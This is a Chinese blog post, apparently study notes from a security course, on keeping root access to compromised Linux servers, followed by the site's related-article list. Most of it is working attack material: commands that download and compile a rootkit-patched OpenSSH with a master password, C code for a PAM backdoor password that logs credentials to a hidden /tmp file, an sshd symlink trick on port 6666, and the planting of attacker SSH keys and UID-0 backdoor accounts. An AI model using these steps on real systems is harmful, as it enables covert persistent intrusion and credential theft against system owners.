144-Linux权限维持&OpenSSH&PAM后门&SSH软链接&公私钥登录

于 2024-08-30 10:19:38 发布
阅读量373 收藏 6
点赞数 18
分类专栏: # 小迪安全学习笔记 文章标签: web安全 网络安全 系统安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/141710815
版权

参考:https://blog.csdn.net/weixin_53009585/article/details/130173061

参考:https://flowus.cn/along/share/0741e138-979a-45c4-a824-203b3037faf7

参考:https://blog.csdn.net/weixin_44268918/article/details/132425901

权限维持-Linux-替换版本-OpenSSH后门

替换本身操作系统的ssh协议支撑软件openssh,重新安装自定义的openssh,达到记录帐号密码,也可以采用万能密码连接的功能。

首先安装好环境(在受害机上进行)。这就不怎么现实,还yum去下安装软件。。。大部分Linux连yum都没有都是那种阉割过的网络设备

yum -y install openssl openssl-devel pam-devel zlib zlib-devel

yum -y install gcc gcc-c++ make

上传两个安装包

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz

wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

tar -xzvf openssh-5.9p1.tar.gz

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1

cd openssh-5.9p1 && patch < sshbd5.9p1.diff

然后再openssh-5.9p1这个目录下面修改includes.h这个文件

其中

ILOG是别人用ssh登录该主机记录的日志目录

OLOG是该主机用ssh登录其他主机记录的日志目录

SECRETPW 就是万能密码

所以除了万能密码还可以查看通过ssh登录过的明文密码

上面修改完配置文件后需要重新编译还可以修改一下版本信息

vim version.h

编译

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install

service sshd restart 或者 systemctl restart sshd.service 重启ssh

这里我不知道为什么重启服务有点问题然后问了下ai发现是私钥的权限设置有问题

大概是报这些错误

然后只要把这些key全部修改为600的权限即可

然后再重启虽然任然报错说超时但是ssh可以登录了,然后使用写入的万能密码也是成功的登录

ssh的版本也修改成功了

而且此密码无论什么用户都可以登录上

不过不能用来su root的时候输入

不过我也遇到了登录了几次后突然显示连接失败的问题,感觉不是很稳定的样子。

另外还可以修改配置文件的时间等等隐藏痕迹

Linux OpenSSH后门的添加与防范

如果使用的不是万能密码登录的都会被记录在ilog或者 olog

权限维持-Linux-更改验证-SSH-PAM后门

参考: https://xz.aliyun.com/t/7902

看了一下文章有一键脚本使用

先走一遍

关闭selinux

setenforce 0

查询rpm版本

rpm -qa | grep pam

可以看到是1.1.8版本的

可能是为了防止被当做后门直接都删除了老版本的压缩包,视频中的1.1.8的版本的包被删除了。。。

不过在网上找了一下还是找到了

blfs-conglomeration-Linux-PAM安装包下载_开源镜像站-阿里云

下载

解压

tar -xjvf Linux-PAM-1.1.8.tar.bz2

下载编译环境

yum install gcc flex flex-devel -y

修改配置文件写入后门密码

vim Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c

在181行这里中间插入

 

if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);}

编译,在Linux-PAM-1.1.8路径下

./configure && make

备份一份pam_unix.so防止出错

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp

cd modules/pam_unix/.libs

覆盖

cp pam_unix.so /usr/lib64/security/pam_unix.so

然后就可以使用自定义的密码登录了

也是无论什么用户都可以使用此密码登录

同时如果不是使用的后门密码登录的也会记录在前面定义的/tmp/.sshlog

权限维持-Linux-登录方式-软链接&公私钥&新帐号

SSH软链接

在sshd服务配置启用PAM认证的前提下,PAM配置文件中控制标志为sufficient时,只要pam_rootok模块检测uid为0(root)即可成功认证登录。

需要SSH配置中开启了PAM进行身份验证

查看是否使用PAM进行身份验证:

cat /etc/ssh/sshd_config|grep UsePAM

创建软连接并且在启动一个ssh登录的端口

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=6666

有些情况可能端口没有放行需要配置一下防火墙

firewall-cmd --add-port=6666/tcp --permanent //放行6666端口

firewall-cmd --reload //重启防火墙

firewall-cmd --query-port=6666/tcp //查看是否放行成功

云服务可能还需要修改规则组

然后指定端口,任意密码都可以登录成功

不过此方法有个缺点就是重启服务会导致失效,不过可以写计划任务之类的配合

公私钥

这个方式算是非常常见的留后门方式了在本地生成公私钥,然后将公钥放到受害机的/root/.ssh/authorized_keys(这个文件中可以保存多个公钥,所以在实战环境中建议写入而不是直接覆盖,可能会一不小心破坏了受害人的登录公钥)

服务器开启使用公私钥登录方式

vim /etc/ssh/sshd_config

写入

RSAAuthentication yes

PubkeyAuthentication yes

AuthorizedKeysFile .ssh/authorized_keys

本地生成公私钥(是在攻击机上生成)

ssh-keygen -t rsa #三次回车,其中是可以设置密码的,三次为空就是不设置密码 (可以使用-f自定义生成的文件名)

会得到两个文件

id_rsa : 私钥

id_rsa.pub : 公钥

然后把公钥传到受害机,并且写入/root/.ssh/authorized_keys

没有文件就自己创建,有些环境下会对这些文件的权限有要求,高了或者低了都可能会导致出错

mkdir -p /root/.ssh

chmod 700 /root/.ssh

touch /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys

然后将pub文件上传,这里可以使用scp命令

将当前目录下的pub上传到靶机的~/下面

将pub写入authorized_keys

cat dreamer292.pub >> /root/.ssh/authorized_keys

然后这个时候就可以使用私钥登录了

使用-i指定私钥

此方式有些落后了,这种公私钥都是重点检测的地方。

后门账号

第一种创建一个root权限的用户

useradd -p `openssl passwd -1 -salt 'salt' 123456` dreamer292 -o -u 0 -g root -G root -s /bin/bash -d /home/dreamer292

创建成功后查看passwd可以看到此用户,用此用户登录成功也是root权限

第二种直接修改/etc/passwd文件

此方法在提权的时候也可以用到如果passwd是可写的话

echo "dreamer:x:0:0::/:/bin/bash" >> /etc/passwd #增加超级用户账号

passwd dreamer #修改dreamer的密码为123456

然后在实战中可能会遇到获取不到这样完整的交互式shell的情况,可以用这样的方式写密码

在靶机上执行

openssl passwd -1 123456

生成MD5加密的密码

列如 密码 $1$g5g8nlHa$hKMY7M7RMhoEvPw5Vl0Ly0

echo 'dreamer2:$1$g5g8nlHa$hKMY7M7RMhoEvPw5Vl0Ly0:0:0:root:/root:/bin/bash' >>/etc/passwd

这也是我平时打靶收获的一些小技巧

不过话说回来这直接修改passwd文件或者创建用户的操作也是非常敏感的行为,容易被发现。

 

dreamer292
关注
  • 18
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux权限维持OpenSSH&PAM后门&SSH软连接&私钥登录
剁椒鱼头没剁椒的博客
08-22 2924
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
权限维持Linux&OpenSSH&PAM后门&SSH软链接&私钥登录
今天是几号的博客
04-16 1787
可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
内网渗透之Linux权限维持-OpenSSH&PAM后门&SSH软链接&私钥登录
m0_62207170的博客
05-21 734
内网渗透之Linux权限维持-OpenSSH&PAM后门&SSH软链接&私钥登录
CVE-2024-6387&Open SSH漏洞彻底解决举措(含踩坑内容)
yh
07-10 2069
漏洞OpenSSH版本升级
应急响应实战笔记——权限维持篇:④ Linux权限维持&后门
君逍遥o
04-02 1262
首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。如果匹配成功就可以登录了。
Linux权限维持后门
越努力 越自由
04-18 3755
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
权限维持 | linux密码抓取和后门(上)
weixin_42282189的博客
10-27 1716
作者: 1e0n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 本文主要是简单介绍在获取到Linux服务器root权限的情况下,如何获取明文密码并维持权限。感谢不愿意透露姓名的抠脚大汉提供相关的踩坑笔记。 1、Linux服务器用户密码抓取 2、PAM后门 3、OpenSSH后门 0x01 Linux服务器用户密码抓取 测试机器系统信息:centos7 x64 用户权限:ROOT 测试机器IP:192.168.122.1 1.1 什么是strace和alias?.
Linux权限维持
qq_40012781的博客
07-03 477
Linux权限维持
Linux OpenSSH后门的添加与防范
博文视点(北京)官方博客
02-09 2898
相对于Windows,Linux操作系统的密码较难获取。不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的。 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH后门是入侵者的惯用方式之一。OpenSSH后门比较难检测,本文选自《黑客攻防:实战加密与解密》将与您一起探讨如何添加及防范OpenSSH后门
SSH后门万能密码
墨鱼菜鸡
07-19 193
当我们在获得一台Linux服务器的 root 权限后,我们第一想做的就是如何维持这个权限维持权限肯定想到的就是在目标服务器留下一个后门。但是留普通后门,肯定很容易被发现。我们今天要讲的就是留一个SSH后门,是通过修改SSH源代码的方式来留一个万能的SSH密码。 环境: 软件包准备: openss...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 663
权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 2083
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
网络安全售前入门04——审计类产品了解
打工人
08-26 396
数据库审计是结合各类法令法规(如等级保护2.0、分级保护、企业内控、SOX、PCI等)对数据库安全的要求,细粒度审计、双向审计、全方位风险控制,是一款基于对数据库传输协议深度解析的基础上,进行风险和告警通知的系统。
Web安全之XSS跨站脚本攻击
最新发布
good good study day day up
08-29 803
XSS漏洞简介、原理、攻击方式、危害、常用标签、绕过技巧、防御
网络安全】服务基础第一阶段——第二节:Windows系统管理基础----虚拟化IP地址以及用户与组管理
goldfish8848的博客
08-25 1216
不同的用户身份拥有不同的权限,每个用户包含一个名称和一个密码,用户账户拥有唯一的安全标识Windows系统中,每个用户账户都有一个独特的安全标识符(SID,Security Identifier)它在系统内部用于控制对各种资源的访问权限。我们可以通过不同的方法查看用户的SID:1.使用命令提示符(CMD)这里的CMD就是我们常用的命令提示符(类似于终端的那个窗口),输入命令来查看当前登陆用户的SID如果需要查看特定用户的SID,可以使用命令。
网络安全教程初级简介
网络研究观
08-26 518
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
网络安全】漏洞挖掘
anquan2233的博客
08-29 720
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值